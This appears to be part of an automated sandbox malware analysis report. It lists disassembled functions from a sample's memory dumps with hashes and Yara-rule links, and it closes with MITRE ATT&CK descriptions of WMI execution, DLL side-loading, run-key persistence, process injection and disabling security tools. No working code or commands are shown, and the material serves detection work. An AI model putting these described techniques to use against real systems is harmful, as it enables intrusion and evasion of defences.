Strings

Te^q, xrefs: 02A009FA

Memory Dump Source

Source File: 00000003.00000002.1842393762.0000000002A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2a00000_ibrzb.jbxd

Similarity

API ID:
String ID: Te^q
API String ID: 0-671973202
Opcode ID: 12a717680414e19ec895c7f400fd90b6f268e7ba4582a994c3efa10e70828cef
Instruction ID: db4467835582d55626d6687c9d197952e9b2d293b3fc1381ff855b56ee01d426
Opcode Fuzzy Hash: 12a717680414e19ec895c7f400fd90b6f268e7ba4582a994c3efa10e70828cef
Instruction Fuzzy Hash: 6B51F630B402188FDB48AB79D568ABE7BE7AFC9744B15446DD806DB3A5DE31DC028B81

Function 02A00BA1 Relevance: 1.4, Strings: 1, Instructions: 145COMMON

Download Yara Rule

Strings

\s^q, xrefs: 02A00D23

Memory Dump Source

Source File: 00000003.00000002.1842393762.0000000002A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2a00000_ibrzb.jbxd

Similarity

API ID:
String ID: \s^q
API String ID: 0-4111632511
Opcode ID: 4f7f0f7d183e0e3ff2beafabb55370dd7bfceec0c6bfd686866a0657972eb6eb
Instruction ID: b7dd88b53be7cd90c6baa76beff9eb2e9535bfe621c81f6b07e4abf425ce862f
Opcode Fuzzy Hash: 4f7f0f7d183e0e3ff2beafabb55370dd7bfceec0c6bfd686866a0657972eb6eb
Instruction Fuzzy Hash: 8C511978D4020E9FDF00CFA9D984AEEBBB1BF88314F10A555D406EB295DB31AA46CF50

Function 02A0C4F8 Relevance: 1.4, Strings: 1, Instructions: 128COMMON

Download Yara Rule

Strings

TJcq, xrefs: 02A0C5E3

Memory Dump Source

Source File: 00000003.00000002.1842393762.0000000002A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2a00000_ibrzb.jbxd

Similarity

API ID:
String ID: TJcq
API String ID: 0-1911830065
Opcode ID: 54ca67919f536f877477908a6518d5eb1d7c225662ea49b0b1da8c4e6d7eaa68
Instruction ID: 6caa0b4241338b4aa630cbe5dc75713cd03ffc6f96de4882fe265cc278db735d
Opcode Fuzzy Hash: 54ca67919f536f877477908a6518d5eb1d7c225662ea49b0b1da8c4e6d7eaa68
Instruction Fuzzy Hash: EA51D278D80208DFCB04DFA9E588AAEBBF2FF88314F14856AE415A7390DB346945CF55

Function 02A0C508 Relevance: 1.4, Strings: 1, Instructions: 125COMMON

Download Yara Rule

Strings

TJcq, xrefs: 02A0C5E3

Memory Dump Source

Source File: 00000003.00000002.1842393762.0000000002A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2a00000_ibrzb.jbxd

Similarity

API ID:
String ID: TJcq
API String ID: 0-1911830065
Opcode ID: 23d4dc92d8bd2a71ada58f94503c4ee0b44596e2f7976dc133eeeee0239c4e24
Instruction ID: b705af446105b76405b6999d293c0a18980f3741a061a20a3b14520d4e91c966
Opcode Fuzzy Hash: 23d4dc92d8bd2a71ada58f94503c4ee0b44596e2f7976dc133eeeee0239c4e24
Instruction Fuzzy Hash: 8251D278D84208DFCB04DFA9E598AAEBBF2FF88314F10856AE415A7390DB346945CF54

Function 02A02039 Relevance: 1.3, Strings: 1, Instructions: 77COMMON

Download Yara Rule

Strings

\s^q, xrefs: 02A0209F

Memory Dump Source

Source File: 00000003.00000002.1842393762.0000000002A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2a00000_ibrzb.jbxd

Similarity

API ID:
String ID: \s^q
API String ID: 0-4111632511
Opcode ID: 95bbff1594913480abd772b02e8cf56b5f3dfb072f571291560ef70881f96702
Instruction ID: 5780441f404885d9e71e816061ad90d9fa8b1d670195632c294e57f563362272
Opcode Fuzzy Hash: 95bbff1594913480abd772b02e8cf56b5f3dfb072f571291560ef70881f96702
Instruction Fuzzy Hash: B2218E317406204FC765DF78E898E6A7BF5AF8975430544E9E84ACB7B5DA21DC42C780

Function 052D0D91 Relevance: 1.3, Strings: 1, Instructions: 65COMMON

Download Yara Rule

Strings

4'^q, xrefs: 052D1549

Memory Dump Source

Source File: 00000003.00000002.1862431988.00000000052D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_52d0000_ibrzb.jbxd

Similarity

API ID:
String ID: 4'^q
API String ID: 0-1614139903
Opcode ID: 7b9ff2c8d8d419c70c2918a5d0d66bf96f61c68e3009b07b92cb98d8324937f7
Instruction ID: 1c190a1ab04bd7414c5b91105cb31a3a8a3514b6a3dcf4ebf2d58f5b7d49cb6d
Opcode Fuzzy Hash: 7b9ff2c8d8d419c70c2918a5d0d66bf96f61c68e3009b07b92cb98d8324937f7
Instruction Fuzzy Hash: F8211934D2424ACFDB18CFA9D5486FEBBB2FF44301F10806AD41667290DB745A91CFA1

Function 052D0D98 Relevance: 1.3, Strings: 1, Instructions: 64COMMON

Download Yara Rule

Strings

4'^q, xrefs: 052D1549

Memory Dump Source

Source File: 00000003.00000002.1862431988.00000000052D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_52d0000_ibrzb.jbxd

Similarity

API ID:
String ID: 4'^q
API String ID: 0-1614139903
Opcode ID: 03724c758779f179468a27a45aaea3273cab42250660a76158644577cd536b30
Instruction ID: 3dcda29a61db4e4971697d355e0dde23d59d1ebe23910e9d60c08749f95d73c2
Opcode Fuzzy Hash: 03724c758779f179468a27a45aaea3273cab42250660a76158644577cd536b30
Instruction Fuzzy Hash: F621E734D24249CBDB18CFA9D5486FEBBB2FF44301F10806AD51667290DB745A51CFA0

Function 02A00B30 Relevance: 1.3, Strings: 1, Instructions: 37COMMON

Download Yara Rule

Strings

8bq, xrefs: 02A00B5B

Memory Dump Source

Source File: 00000003.00000002.1842393762.0000000002A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2a00000_ibrzb.jbxd

Similarity

API ID:
String ID: 8bq
API String ID: 0-187764589
Opcode ID: e83cbd3be642e49d5fa90fdef73b1e916d93dd8a05b5d433f8ff3df668311e4e
Instruction ID: 7e07beb234aefc5b0ee58e01a76af5b9d36c624c1e5f68df1b49782292aa3048
Opcode Fuzzy Hash: e83cbd3be642e49d5fa90fdef73b1e916d93dd8a05b5d433f8ff3df668311e4e
Instruction Fuzzy Hash: B2F0F0342441044FC381AB69E5A4BAA7BE6EFC9318B4400A9E10DC77A6EE319C168B95

Function 02A00B40 Relevance: 1.3, Strings: 1, Instructions: 29COMMON

Download Yara Rule

Strings

8bq, xrefs: 02A00B5B

Memory Dump Source

Source File: 00000003.00000002.1842393762.0000000002A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2a00000_ibrzb.jbxd

Similarity

API ID:
String ID: 8bq
API String ID: 0-187764589
Opcode ID: 98fc6245df2470cba4c1773969851d1a3f780e9d8bfdd8cd6c8cdfcc57114ecd
Instruction ID: 53c8ab26b999eb673571e8ea0274f7ae18f5aba41fd6a32a9c8c909537ebef9b
Opcode Fuzzy Hash: 98fc6245df2470cba4c1773969851d1a3f780e9d8bfdd8cd6c8cdfcc57114ecd
Instruction Fuzzy Hash: D7F0A0353002048FC280AB69E524A5A77DAEFC9215B800068E109C77A5EF31AC068B95

Function 02A07A53 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1842393762.0000000002A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2a00000_ibrzb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13e8a25de72fa23608c3c15fce8182edcc4540a6bcc12ec3a15b7f80ab188a24
Instruction ID: f7d3891f8fa06a2cb30cadcce30781de30e62fdaf712cd2582987431fb5e82bb
Opcode Fuzzy Hash: 13e8a25de72fa23608c3c15fce8182edcc4540a6bcc12ec3a15b7f80ab188a24
Instruction Fuzzy Hash: D2310674E042099FDB04DFAAD9847EEFBF2BB88300F148829D515A3284DB745A45CFA1

Function 02A07A60 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1842393762.0000000002A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2a00000_ibrzb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc7420b09f1ff82ad015f7b279ab2b9bec410ada75b0d341b743d99dcfa983a4
Instruction ID: cb39e4fbc7eecca0163224f4fee35d137e1b80233277a1201bbfa8365c639b0b
Opcode Fuzzy Hash: cc7420b09f1ff82ad015f7b279ab2b9bec410ada75b0d341b743d99dcfa983a4
Instruction Fuzzy Hash: 0121F5B4E04209DFDB04DFAAD9847EEFBF6BB89300F108829D515A3284DB745A55CFA0

Function 029BD01C Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1841441189.00000000029BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 029BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_29bd000_ibrzb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 012bbf137218198c2abf4662014f28c9e3ee6ad88a15e3afb421643e95a3af29
Instruction ID: 7aacc12eb1c4a03261171b06dbe7f6e0f2af88d6c4ef504268c61b1e2f708c8b
Opcode Fuzzy Hash: 012bbf137218198c2abf4662014f28c9e3ee6ad88a15e3afb421643e95a3af29
Instruction Fuzzy Hash: BB212271504244DFDB16DF14DAC4B6ABFA9FF88324F24C569E9090B246C336D44ACBB2

Function 02A0349B Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1842393762.0000000002A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2a00000_ibrzb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 29ce05fedbc791259a10f49718132e23f72d0e1eb236fa8c5ce62a3916264596
Instruction ID: 36457a7fc9c58ddc45f9c09ca81634076e2c539723465498c8a916c5ec8393d2
Opcode Fuzzy Hash: 29ce05fedbc791259a10f49718132e23f72d0e1eb236fa8c5ce62a3916264596
Instruction Fuzzy Hash: E9211570D492089FDB02EFA9D1983ADBBF5EF89305F1089EAD009A7291DBB64955CF01

Function 02A0E2A0 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1842393762.0000000002A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2a00000_ibrzb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: afcd06fa2c5c5f20e9131e7b53f48367d9d8eef07f3313f18faf5c2bffdb21a9
Instruction ID: d72114a1aba6d81b7b13bbf3ea23471d07eade077f7528fbba4f66f154af534e
Opcode Fuzzy Hash: afcd06fa2c5c5f20e9131e7b53f48367d9d8eef07f3313f18faf5c2bffdb21a9
Instruction Fuzzy Hash: 5A213774D05219CBDB04DFA5E6882EEFBB9FF8C310F10982AD405B7280DBB41A55CBA1

Function 02A034A8 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1842393762.0000000002A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2a00000_ibrzb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 422d5d7deb62837af7a0ea458ced9df0bc2039df39a6420747ceec772a0bf645
Instruction ID: c7299f4c69772eea3149d8ac7ec2f60212a09d568814e7d1183bdb8eb4748504
Opcode Fuzzy Hash: 422d5d7deb62837af7a0ea458ced9df0bc2039df39a6420747ceec772a0bf645
Instruction Fuzzy Hash: 0821F870D45208DFDB01EFA9D1983AEBBF5BF48305F1089A9D509A7280DBB54A50CF05

Function 02A00857 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1842393762.0000000002A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2a00000_ibrzb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 044c6fe2f5839ec92fac4b43bf127bf56bfe7387f45957a864f3a6c7e251b2d3
Instruction ID: d0a52dfe066db68e85ef521bcfd3914c4577d62f5cd050a811a52846f09d9888
Opcode Fuzzy Hash: 044c6fe2f5839ec92fac4b43bf127bf56bfe7387f45957a864f3a6c7e251b2d3
Instruction Fuzzy Hash: C511DD36B002188FEB159B74D99876E37E7AFC968471484ADD84ACB391EE31CC038B81

Function 029BD007 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1841441189.00000000029BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 029BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_29bd000_ibrzb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f41a90bb9699f17f9b603803ea4c2c9bb4d3eea6854f403f40091dd5ff20f819
Instruction ID: a2706207a594faef75e9b722c6780c5d2aefc673f4c7ef2ef394cf9736b4c275
Opcode Fuzzy Hash: f41a90bb9699f17f9b603803ea4c2c9bb4d3eea6854f403f40091dd5ff20f819
Instruction Fuzzy Hash: 2B218E755093C08FCB13CF24DA94B56BF71EF86214F2881DAD8458B667C33A981ACB62

Function 02A00AE4 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1842393762.0000000002A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2a00000_ibrzb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0799a85305a72606489f3914c7e718fcbf8bcb99ffe692d2f26b841b9d363652
Instruction ID: f5fcf12adb505ee7ebfac30b3c56212001e12770491cf8d3b9c6273db23a0d0a
Opcode Fuzzy Hash: 0799a85305a72606489f3914c7e718fcbf8bcb99ffe692d2f26b841b9d363652
Instruction Fuzzy Hash: F1F0E53464C2804FC7035BBCE9A84B87FF2AF4B11031545E7E885CB767CA219C22C712

Function 02A08BD3 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1842393762.0000000002A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2a00000_ibrzb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c855d8672edd55d65f92da5d36b77f9ed763a2323810cca242e7fbb21cb8826
Instruction ID: 2614f395c57c41f91e661ec5207daf5eb68df4b4533c49b2b9284979bb014d5c
Opcode Fuzzy Hash: 8c855d8672edd55d65f92da5d36b77f9ed763a2323810cca242e7fbb21cb8826
Instruction Fuzzy Hash: 42F0DA74905108EFCB45DFA8D54169DBBB4EB48310F14C5AAA81892341DB359A51DF44

Function 02A08446 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1842393762.0000000002A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2a00000_ibrzb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a9bcc8474c0ebc421ea22e9ffd252a7ee7813135065e37605f53b7a2239337d
Instruction ID: 42dcccd82cb85e98d75ea5c2a723524162a76df4503c661236bfe94f005656bf
Opcode Fuzzy Hash: 5a9bcc8474c0ebc421ea22e9ffd252a7ee7813135065e37605f53b7a2239337d
Instruction Fuzzy Hash: F2F01CB5A45218CFCB10CFA5E580ADDFBB1FB89700F5151A5D209A7351CB349E51CF14

Function 02A0C909 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1842393762.0000000002A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2a00000_ibrzb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2571c36daf832d7a2794c74fad84674c4d16415ba6146e312db0542084e626bb
Instruction ID: 21a4ca09b188838312d5a11c7ac27f80e8f772d4deb7d4089f66c2350296b960
Opcode Fuzzy Hash: 2571c36daf832d7a2794c74fad84674c4d16415ba6146e312db0542084e626bb
Instruction Fuzzy Hash: 7AE09230D44118DBC700CFB5E8897ACBBB9EF45310F14C19998485B3C1DB319942CF81

Function 02A0C4C0 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1842393762.0000000002A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2a00000_ibrzb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e6656abe78d138a7df604cfee4d2dd23f19fd750d4ef44cb967d7684cc5af64
Instruction ID: fc71dfc1062c4aee10ae34703e62ad0a7e2d0d0095ab9894eab86e2500406679
Opcode Fuzzy Hash: 3e6656abe78d138a7df604cfee4d2dd23f19fd750d4ef44cb967d7684cc5af64
Instruction Fuzzy Hash: 73E04F30544108DFCB40CF75E989BB877A8FB15314F4485AED804872D1DB32A941CB91

Function 02A07BA8 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1842393762.0000000002A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2a00000_ibrzb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15db958c135af3f7b0fef6a585fd580fdccfb15321476a58d6050389c4b8b994
Instruction ID: f5ae7ece2230c824cafac27cb60e12e49494d82fca20686e511527009879b97f
Opcode Fuzzy Hash: 15db958c135af3f7b0fef6a585fd580fdccfb15321476a58d6050389c4b8b994
Instruction Fuzzy Hash: 77E0DF31884208EFD301EFF4E6483EA77F9EF09310F0048A6E404A3110EF354A919B62

Function 02A0D1A8 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1842393762.0000000002A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2a00000_ibrzb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab37100ebb1aa12e671248ad316d81c39d18f66d704f30023caca8e8acf50eb9
Instruction ID: adf0009f3d3310cf0023171b5e026895bd8be8495bd3085e216c1c7c9b6c68bd
Opcode Fuzzy Hash: ab37100ebb1aa12e671248ad316d81c39d18f66d704f30023caca8e8acf50eb9
Instruction Fuzzy Hash: 4DE01A34E04208EBC744DFD8E5805ACBBB9EB48304F10C5A9980853340CA316E45CF40

Function 02A0FAB0 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1842393762.0000000002A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2a00000_ibrzb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5db340943bf480e8791dbf4e76eedd2f0a1b0efdcdfac01e6f70b9fcef1f6cb6
Instruction ID: ebededfccff732679afe96eac9fb4419f9a0c2b4abfb77232d8a8943e3666c60
Opcode Fuzzy Hash: 5db340943bf480e8791dbf4e76eedd2f0a1b0efdcdfac01e6f70b9fcef1f6cb6
Instruction Fuzzy Hash: 54E08C34908208EFCB04DF94E9809ACBBB8EB49310F14C1AAEC0463390CF329E52DBD0

Function 02A0E260 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1842393762.0000000002A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2a00000_ibrzb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 862ce69184515da4076a80a911c6ff35cf7d31797b9431c131cf53eea917ec9f
Instruction ID: d902af31e25c73fbdc7323353b6a896436ed9e1652f9ee43580e8dcd54dad11b
Opcode Fuzzy Hash: 862ce69184515da4076a80a911c6ff35cf7d31797b9431c131cf53eea917ec9f
Instruction Fuzzy Hash: 5AE0EC74A49108DBCB04DF94E6C15ACFBB9AB4E314F109599984817391CA315E52DB91

Function 02A07BB8 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1842393762.0000000002A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2a00000_ibrzb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01d0d12c2b17849e5fcddf8261667902284b5e24b024a5831209025486cbf1e1
Instruction ID: abf49d75c6e79d88cac6eae8c734473556f08c89f6cc2da1b2400a01bd79a1f1
Opcode Fuzzy Hash: 01d0d12c2b17849e5fcddf8261667902284b5e24b024a5831209025486cbf1e1
Instruction Fuzzy Hash: 98E0C23194020CDFC701EFF4D6086EE7BF9EF09300F0048E6E509A3150EE315A509BA2

Function 02A07A10 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1842393762.0000000002A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2a00000_ibrzb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90e8c3d6e54773e28aa2e87705280409ff56a3e34661afb6d07ad3dff53fd5e3
Instruction ID: a1324657e9783b9e4172d9c794559f714f528e181f0597ca50f1849a0bd08447
Opcode Fuzzy Hash: 90e8c3d6e54773e28aa2e87705280409ff56a3e34661afb6d07ad3dff53fd5e3
Instruction Fuzzy Hash: 53D02B30848204C7D7061F14E9A63F27795EF89305F046951980D82280DA714520C7A1

Function 02A0C4D0 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1842393762.0000000002A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2a00000_ibrzb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da82db6da15f2dd6cd4a7b0df51458f3f48c0a1981719c5a5ca2561113ff5c93
Instruction ID: 49f06c01dfbd6d77ce0ea81fceb7bcfb9610eb96b67f588e2e92698972ac66cb
Opcode Fuzzy Hash: da82db6da15f2dd6cd4a7b0df51458f3f48c0a1981719c5a5ca2561113ff5c93
Instruction Fuzzy Hash: 6AD0A730509108DBC754CF99E594AB8B7BDFB46328F10959D980893381CF339E01CB64

Function 02A0799B Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1842393762.0000000002A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2a00000_ibrzb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 265ffc325c62cd313799682cdda46f050631addda4d89897368121ca79e6a6af
Instruction ID: a64ada42a2a6a85053967f18a15f97314226a90fda4151ca63fb06f0b427eb56
Opcode Fuzzy Hash: 265ffc325c62cd313799682cdda46f050631addda4d89897368121ca79e6a6af
Instruction Fuzzy Hash: 9DD0C97198834487D7466BA8EB8E7A57BA8AF09215F080958A909901A1EE68A460CB39

Function 02A079A8 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1842393762.0000000002A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2a00000_ibrzb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 391d41789180c857cc0c986e5c4fdb89f5029c1959fa1a6cc6132be0350c6ec8
Instruction ID: 10c1acafc863f6ad0dcc42c06dac61178ede0c914e774b2b98f8f971321b2b77
Opcode Fuzzy Hash: 391d41789180c857cc0c986e5c4fdb89f5029c1959fa1a6cc6132be0350c6ec8
Instruction Fuzzy Hash: 5CC08C30888204CBC2867BF8BB8C7B877686B08316F000D10F50C400609F7424A0CB3A

Function 02A00840 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1842393762.0000000002A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2a00000_ibrzb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1ee6f4bb9738a63faa60609070dd888fe81076985681009c1a968e6832aa256b
Instruction ID: 94a3b2aacf949427edcc232f1e50f82a370c6020bdc0fad6177e439a5194e559
Opcode Fuzzy Hash: 1ee6f4bb9738a63faa60609070dd888fe81076985681009c1a968e6832aa256b
Instruction Fuzzy Hash: 15C0920820F7C05FDB1342764C7A2A17FF06C8740238C84CBC9C08BAB2D009A807A323

Function 02A02020 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1842393762.0000000002A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2a00000_ibrzb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c5f6ff112bc7d427c0052d979879750ae02d737e9f2fb11825de54d923708db8
Instruction ID: 99569c775874e555396c6b4ea89b847102b87d2ada013256447a50b496046ab4
Opcode Fuzzy Hash: c5f6ff112bc7d427c0052d979879750ae02d737e9f2fb11825de54d923708db8
Instruction Fuzzy Hash: FDB012317483090A1E605BF13A48B26B28C95405447400560AC0CC0000FE00D8104140

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
